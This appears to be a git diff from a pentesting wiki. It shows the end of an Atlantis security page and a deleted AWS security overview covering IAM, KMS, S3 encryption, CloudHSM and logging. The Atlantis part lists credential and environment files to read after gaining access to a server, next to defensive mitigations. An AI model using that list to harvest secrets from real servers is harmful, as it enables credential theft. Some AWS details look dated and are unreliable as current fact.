- -Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. - -* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. 
-* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). - -## Post-Exploitation - -If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: - -* `/home/atlantis/.git-credentials` Contains vcs access credentials -* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -* `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - * Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate -* `/proc/1/environ` Env variables -* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) - -## Mitigations - -### Don't Use On Public Repos - -Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. - -### Don't Use `--allow-fork-prs` - -If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. - -### `--repo-allowlist` - -Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: - -* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -* Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. 
- -This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. - -### Protect Terraform Planning - -If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. - -To prevent this, you could: - -1. Bake providers into the Atlantis image or host and deny egress in production. -2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. -3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. - -### Webhook Secrets - -Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). - -If you are using Azure DevOps, instead of webhook secrets add a basic username and password. 
- -[**#**](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)**Azure DevOps Basic Authentication** - -Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. - -### SSL/HTTPS - -If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. - -### Enable Authentication on Atlantis Web Server - -It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. - -You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. - -## References - -* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)\*\*\*\* - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md deleted file mode 100644 index 71a11f3b1..000000000 --- a/cloud-security/aws-security.md +++ /dev/null @@ -1,1019 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Types of services - -## Container services - -Services that fall under container services have the following characteristics: - -* The service itself runs on **separate infrastructure instances**, such as EC2. -* **AWS** is responsible for **managing the operating system and the platform**. -* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. -* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. -* Also, platform-level identity and access management where it exists. -* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. - -## Abstract Services - -* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. -* The services are accessed via endpoints using AWS application programming interfaces, APIs. -* The **underlying infrastructure, operating system, and platform is managed by AWS**. -* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. -* **Data is isolated via security mechanisms**. -* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. - -# IAM - Identity and Access Management - -IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. - -* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. -* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. 
-* **Access Control** - The method and process of how access is granted to a secure resource - -IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. - -## Users - -This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**. - -### CLI - -* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT -* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). - -Whenever you need to **change the Access Key** this is the process you should follow:\ -_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ - -**MFA** is **supported** when using the AWS **CLI**. - -## Groups - -These are objects that **contain multiple users**. Permissions can be assigned to a user or inherit form a group. **Giving permission to groups and not to users the secure way to grant permissions**. - -## Roles - -Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized. 
- -An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access. - -### AWS Security Token Service (STS) - -This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users). - -## Policies - -### Policy Permissions - -Are used to assign permissions. There are 2 types: - -* AWS managed policies (preconfigured by AWS) -* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. - -By **default access** is **denied**, access will be granted if an explicit role has been specified. \ -If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). - -```javascript -{ - "Version": "2012-10-17", //Version of the policy - "Statement": [ //Main element, there can be more than 1 entry in this array - { - "Sid": "Stmt32894y234276923" //Unique identifier (optional) - "Effect": "Allow", //Allow or deny - "Action": [ //Actions that will be allowed or denied - "ec2:AttachVolume", - "ec2:DetachVolume" - ], - "Resource": [ //Resource the action and effect will be applied to - "arn:aws:ec2:*:*:volume/*", - "arn:aws:ec2:*:*:instance/*" - ], - "Condition": { //Optional element that allow to control when the permission will be effective - "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} - } - } - ] -} -``` - -### Inline Policies - -This kind of policies are **directly assigned** to a user, group or role. 
Then, they do not appear in the Policies list, and no other identity can reuse them.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
-
-### S3 Bucket Policies
-
-Can only be applied to S3 Buckets. They contain an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. **Principals define who/what should be allowed or denied access to various S3 resources.**
-
-## Multi-Factor Authentication
-
-It's used to **create an additional factor for authentication** in addition to your existing methods, such as a password, therefore creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like Google Authenticator for free to activate MFA in AWS.
-
-## Identity Federation
-
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. \
-An example of an identity provider can be your own corporate Microsoft Active Directory (via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\
-AWS Identity Federation connects via IAM roles.
- -### Cross Account Trusts and Roles - -**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\ -It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. - -### AWS Simple AD - -Not supported: - -* Trust Relations -* AD Admin Center -* Full PS API support -* AD Recycle Bin -* Group Managed Service Accounts -* Schema Extensions -* No Direct access to OS or Instances - -### Web Federation or OpenID Authentication - -The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However this doesn't grant access to the AWS console, just access to resources within AWS. - -## Other IAM options - -* You can **set a password policy setting** options like minimum length and password requirements. -* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. - -# KMS - Key Management Service - -AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs) - -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). 
If you need to **encrypt information in transit** you need to use something like **TLS**.\
-KMS is a **region-specific service**.
-
-**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application; it's up to us to administer our encryption keys and how those keys are used.
-
-**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
-
-A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which is used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK.
-
-There are 2 types of master keys:
-
-* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it.
-* **Customer managed CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys.
-
-**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with a data key and then encrypt the data key with a master key**.
-
-## Key Policies
-
-These define **who can use and access a key in KMS**. By default, the root user has full access over KMS; if you delete this permission, you need to contact AWS support to restore it.
-
-Properties of a policy:
-
-* JSON based document
-* Resource --> Affected resources (can be "\*")
-* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions)
-* Effect --> Allow/Deny
-* Principal --> arn affected
-* Conditions (optional) --> Condition to give the permissions
-
-Grants:
-
-* Allow you to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. You can indicate the CMK identifier, the grantee principal and the required level of operation (Decrypt, Encrypt, GenerateDataKey...)
-* After the grant is created, a GrantToken and a GrantId are issued
-
-Access:
-
-* Via key policy -- If this exists, it takes precedence over the IAM policy, so the IAM policy is not used
-* Via IAM policy
-* Via grants
-
-## Key Administrators
-
-Key administrators by default:
-
-* Have access to manage KMS but not to encrypt or decrypt data
-* Only IAM users and roles can be added to the Key Administrators list (not groups)
-* If an external CMK is used, Key Administrators have the permission to import key material
-
-## Rotation of CMKs
-
-* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data at risk. In addition to this, the longer the key is active, the higher the probability of it being breached.
-* **KMS rotates customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years**, and this time cannot be changed.
-* **Older keys are retained** to decrypt data that was encrypted prior to the rotation
-* In case of a breach, rotating the key won't remove the threat as it will still be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
-* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. - -### Manual rotation - -* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -* You need to **keep old keys to decrypt old files** encrypted with it. - -You can import keys from your on-premises key infrastructure . - -## Other information - -KMS is priced per number of encryption/decryption requests received from all services per month. - -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. - -With KMS policy you can do the following: - -* Limit who can create data keys and which services have access to use these keys -* Limit systems access to encrypt only, decrypt only or both -* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). - -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -# S3 - -Amazon S3 is a service that allows you **store important amounts of data**. - -Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case. 
-
-With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
-
-## S3 Access logs
-
-It's possible to **enable S3 access logging** (which by default is disabled) for a bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one saving the logs) need to be in the same region.
-
-## S3 Encryption Mechanisms
-
-**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
-
-**Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of the encryption keys used is handled by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in an S3 account is assigned a bucket key.
-
-* Encryption:
-  * Object Data + created plaintext DEK --> Encrypted data (stored inside S3)
-  * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory
-* Decryption:
-  * Encrypted DEK + S3 Master Key --> Plaintext DEK
-  * Plaintext DEK + Encrypted data --> Object Data
-
-Please note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you will be able to rotate, disable and apply access control.
-
-**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you far greater flexibility in how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and audit their usage using AWS CloudTrail.
-
-* Encryption:
-  * S3 requests data keys from the KMS CMK
-  * KMS uses a CMK to generate the pair plaintext DEK and encrypted DEK and sends them to S3
-  * S3 uses the plaintext key to encrypt the data, stores the encrypted data and the encrypted key, and deletes the plain text key from memory
-* Decryption:
-  * S3 asks KMS to decrypt the encrypted data key of the object
-  * KMS decrypts the data key with the CMK and sends it back to S3
-  * S3 decrypts the object data
-
-**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you.
-
-* Encryption:
-  * The user sends the object data + Customer key to S3
-  * The customer key is used to encrypt the data and the encrypted data is stored
-  * A salted HMAC value of the customer key is also stored for future key validation
-  * The customer key is deleted from memory
-* Decryption:
-  * The user sends the customer key
-  * The key is validated against the stored HMAC value
-  * The customer provided key is then used to decrypt the data
-
-**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client, not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored.
- -* Encryption: - * Client request for a data key to KMS - * KMS returns the plaintext DEK and the encrypted DEK with the CMK - * Both keys are sent back - * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) -* Decryption: - * The encrypted data with the encrypted DEK is sent to the client - * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK - * The client can now decrypt the encrypted data - -**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. - -* Encryption: - * The client generates a DEK and encrypts the plaintext data - * Then, using it's own custom CMK it encrypts the DEK - * submit the encrypted data + encrypted DEK to S3 where it's stored -* Decryption: - * S3 sends the encrypted data and DEK - * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data - -# HSM - Hardware Security Module - -Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. - -The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. 
It is dedicated single tenant appliance exclusively made available to your workloads - -Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity. - -Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. - -In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ -Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. - -Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. 
- -If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. - -**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. - -**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ -Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. 
- -**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. - -## CloudHSM Suggestions - -1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. -2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. -3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear. -4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed. -5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool. -6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance. -7. Another interesting best practice from AWS is **not to change the NTP configuration**. 
It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source. - -The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month. - -The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**. - -The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. - -# Amazon Athena - -Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**. - -You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it. - -Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**. - -**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**. - -SSE-C and CSE-E are not supported. 
In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. - -# AWS CloudTrail - -This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains: - -* The name of the called API: `eventName` -* The called service: `eventSource` -* The time: `eventTime` -* The IP address: `SourceIPAddress` -* The agent method: `userAgent`. Examples: - * Signing.amazonaws.com - From AWS Management Console - * console.amazonaws.com - Root user of the account - * lambda.amazonaws.com - AWS Lambda -* The request parameters: `requestParameters` -* The response elements: `responseElements` - -Events are written to a new log file **approximately every 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ -CloudTrail allows you to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\ -When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events. - -Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that have access to it, but for additional security you can use SSE with KMS and your own keys. 
- -## Log File Naming Convention - -![](<../.gitbook/assets/image (429).png>) - -## S3 folder structure - -![](<../.gitbook/assets/image (428).png>) - -Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names. - -**Digest** files have a similar folder path: - -![](<../.gitbook/assets/image (437).png>) - -## Aggregate Logs from Multiple Accounts - -* Create a Trail in the AWS account where you want the log files to be delivered to -* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access -* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 - -However, even if you can save all the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into CloudWatch Logs belonging to a single AWS account - -## Log Files Checking - -You can check that the logs haven't been altered by running - -```javascript -aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] -``` - -## Logs to CloudWatch - -**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warn you when suspicious activities are performed.**\ -Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: - -* CreateLogStream: This allows CloudTrail to create CloudWatch Logs log streams -* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream - -## Event History - -CloudTrail Event History allows you to inspect in a table the logs that have been recorded: - -![](<../.gitbook/assets/image (431).png>) - -## Insights - -**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. 
For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever. - -# CloudWatch - -Amazon CloudWatch allows you to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\ -CloudWatch Log Events have a **size limitation of 256KB of each log line**. - -You can monitor for example logs from CloudTrail.\ -Events that are monitored: - -* Changes to Security Groups and NACLs -* Starting, Stopping, rebooting and terminating EC2 instances -* Changes to Security Policies within IAM and S3 -* Failed login attempts to the AWS Management Console -* API calls that resulted in failed authorization -* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) - -## Agent Installation - -You can install agents inside your machines/containers to automatically send the logs back to CloudWatch. - -* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM) -* **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage -* **Configure** and **start** the CloudWatch Agent - -A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. 
- -# Cost Explorer and Anomaly detection - -This allows you to check how you are spending money in AWS services and help you **detect anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some anomaly in costs is found. - -## Budgets - -Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). - -# AWS Config - -AWS Config **captures resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI.\ -This service is **region specific**. - -A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. - -* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Other information can include an MD5Hash that allows you to compare other CIs already recorded against the same resource. -* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. 
